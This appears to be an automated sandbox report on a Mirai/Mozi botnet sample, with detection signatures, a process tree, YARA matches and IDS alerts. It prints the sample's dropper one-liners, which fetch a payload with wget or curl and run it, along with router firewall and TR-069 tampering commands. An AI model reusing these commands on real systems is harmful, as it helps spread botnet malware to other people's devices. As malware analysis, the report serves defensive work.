Loading ...

Play interactive tourEdit tour

Analysis Report nT7K5GG5km

Overview

General Information

Sample Name:nT7K5GG5km
Analysis ID:402069
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • nT7K5GG5km (PID: 4587, Parent: 4520, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/nT7K5GG5km
    • nT7K5GG5km New Fork (PID: 4598, Parent: 4587)
      • nT7K5GG5km New Fork (PID: 4600, Parent: 4598)
        • sh (PID: 4602, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4604, Parent: 4602)
          • killall (PID: 4604, Parent: 4602, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • nT7K5GG5km New Fork (PID: 4623, Parent: 4600)
          • sh (PID: 4636, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
            • sh New Fork (PID: 4638, Parent: 4636)
            • iptables (PID: 4638, Parent: 4636, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
              • iptables New Fork (PID: 4639, Parent: 4638)
              • modprobe (PID: 4639, Parent: 4638, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4670, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
            • sh New Fork (PID: 4672, Parent: 4670)
            • iptables (PID: 4672, Parent: 4670, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
          • sh (PID: 4674, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
            • sh New Fork (PID: 4679, Parent: 4674)
            • iptables (PID: 4679, Parent: 4674, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
          • sh (PID: 4715, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
            • sh New Fork (PID: 4720, Parent: 4715)
            • iptables (PID: 4720, Parent: 4715, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
          • sh (PID: 4724, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
            • sh New Fork (PID: 4732, Parent: 4724)
            • iptables (PID: 4732, Parent: 4724, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
          • sh (PID: 4750, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
            • sh New Fork (PID: 4755, Parent: 4750)
            • iptables (PID: 4755, Parent: 4750, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
          • sh (PID: 4759, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
            • sh New Fork (PID: 4763, Parent: 4759)
            • iptables (PID: 4763, Parent: 4759, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
          • sh (PID: 4775, Parent: 4623, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
            • sh New Fork (PID: 4785, Parent: 4775)
            • iptables (PID: 4785, Parent: 4775, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
        • sh (PID: 4813, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4815, Parent: 4813)
          • iptables (PID: 4815, Parent: 4813, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4816, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4819, Parent: 4816)
          • iptables (PID: 4819, Parent: 4816, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4828, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4838, Parent: 4828)
          • iptables (PID: 4838, Parent: 4828, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4855, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4866, Parent: 4855)
          • iptables (PID: 4866, Parent: 4855, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4882, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4891, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4893, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4896, Parent: 4893)
          • iptables (PID: 4896, Parent: 4893, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4904, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4915, Parent: 4904)
          • iptables (PID: 4915, Parent: 4904, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4931, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4939, Parent: 4931)
          • iptables (PID: 4939, Parent: 4931, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4955, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4966, Parent: 4955)
          • iptables (PID: 4966, Parent: 4955, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4979, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4986, Parent: 4979)
          • iptables (PID: 4986, Parent: 4979, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4988, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 4992, Parent: 4988)
          • iptables (PID: 4992, Parent: 4988, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5005, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5015, Parent: 5005)
          • iptables (PID: 5015, Parent: 5005, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5031, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5042, Parent: 5031)
          • iptables (PID: 5042, Parent: 5031, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5057, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5063, Parent: 5057)
          • iptables (PID: 5063, Parent: 5057, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5065, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5071, Parent: 5065)
          • iptables (PID: 5071, Parent: 5065, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5085, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5095, Parent: 5085)
          • iptables (PID: 5095, Parent: 5085, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5111, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5119, Parent: 5111)
          • iptables (PID: 5119, Parent: 5111, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5137, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
          • sh New Fork (PID: 5139, Parent: 5137)
          • iptables (PID: 5139, Parent: 5137, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
        • sh (PID: 5149, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
          • sh New Fork (PID: 5158, Parent: 5149)
          • iptables (PID: 5158, Parent: 5149, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
        • sh (PID: 5160, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
          • sh New Fork (PID: 5167, Parent: 5160)
          • iptables (PID: 5167, Parent: 5160, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
        • sh (PID: 5182, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
          • sh New Fork (PID: 5194, Parent: 5182)
          • iptables (PID: 5194, Parent: 5182, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
        • sh (PID: 5210, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
          • sh New Fork (PID: 5215, Parent: 5210)
          • iptables (PID: 5215, Parent: 5210, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 8080 -j ACCEPT
        • sh (PID: 5219, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
          • sh New Fork (PID: 5229, Parent: 5219)
          • iptables (PID: 5229, Parent: 5219, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
        • sh (PID: 5248, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
          • sh New Fork (PID: 5253, Parent: 5248)
          • iptables (PID: 5253, Parent: 5248, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
        • sh (PID: 5257, Parent: 4600, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
          • sh New Fork (PID: 5265, Parent: 5257)
          • iptables (PID: 5265, Parent: 5257, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
  • upstart New Fork (PID: 5293, Parent: 3310)
  • sh (PID: 5293, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5294, Parent: 5293)
    • date (PID: 5294, Parent: 5293, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5295, Parent: 5293)
    • apport-checkreports (PID: 5295, Parent: 5293, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5320, Parent: 3310)
  • sh (PID: 5320, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5323, Parent: 5320)
    • date (PID: 5323, Parent: 5320, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5330, Parent: 5320)
    • apport-gtk (PID: 5330, Parent: 5320, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5347, Parent: 3310)
  • sh (PID: 5347, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5348, Parent: 5347)
    • date (PID: 5348, Parent: 5347, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5349, Parent: 5347)
    • apport-gtk (PID: 5349, Parent: 5347, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
nT7K5GG5kmSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
nT7K5GG5kmJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    nT7K5GG5kmJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      nT7K5GG5kmJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: nT7K5GG5kmAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: nT7K5GG5kmVirustotal: Detection: 65%Perma Link
                Source: nT7K5GG5kmMetadefender: Detection: 51%Perma Link
                Source: nT7K5GG5kmReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: nT7K5GG5kmString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: nT7K5GG5kmString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: nT7K5GG5kmString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/nT7K5GG5km (PID: 4623)Opens: /proc/net/route
                Source: /tmp/nT7K5GG5km (PID: 4623)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:58004 -> 185.146.156.163:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:58004 -> 185.146.156.163:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.83.225.155: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.115.244.92: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.113.97: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.93.0.20: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.233.76.116: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55646 -> 94.91.134.122:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55646 -> 94.91.134.122:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.197.142.165: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.92.49.206: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.188.107.95: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.200.50.12: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.219.171.130: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.71.24.101: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.73.64.16: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.115.11.153: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 74.199.108.177: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 112.30.4.77:29583 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.250.123.141: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 223.130.28.80:12685 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.207.84.233: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.165.138.163: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.175.33.108: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 160.9.43.253: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.65.145.128: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.254.146.23:1027 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.143.214:12658 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.166.181:34323 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.83.51.81: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.10.2.50: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.39.241.178: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.173.141: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:39516
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:57484 -> 104.111.81.230:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:57484 -> 104.111.81.230:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.111.81.230:80 -> 192.168.2.20:57484
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 155.4.82.118: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.2.62.69: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.7.29.198: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50636 -> 81.196.113.75:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 86.65.65.146: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.159.66.221: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.186.146.41: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.78.107.232: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.16.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.255.9: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 72.35.40.202: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.128.213: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 130.236.0.8: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.117.97:80 -> 192.168.2.20:36288
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.94.183.248: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.187.161.54: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.144.251.70: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.41.173: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.223.233.145: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.151.143.192: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.184.161.124: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 192.168.51.205: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.247.129: -> 192.168.2.20:
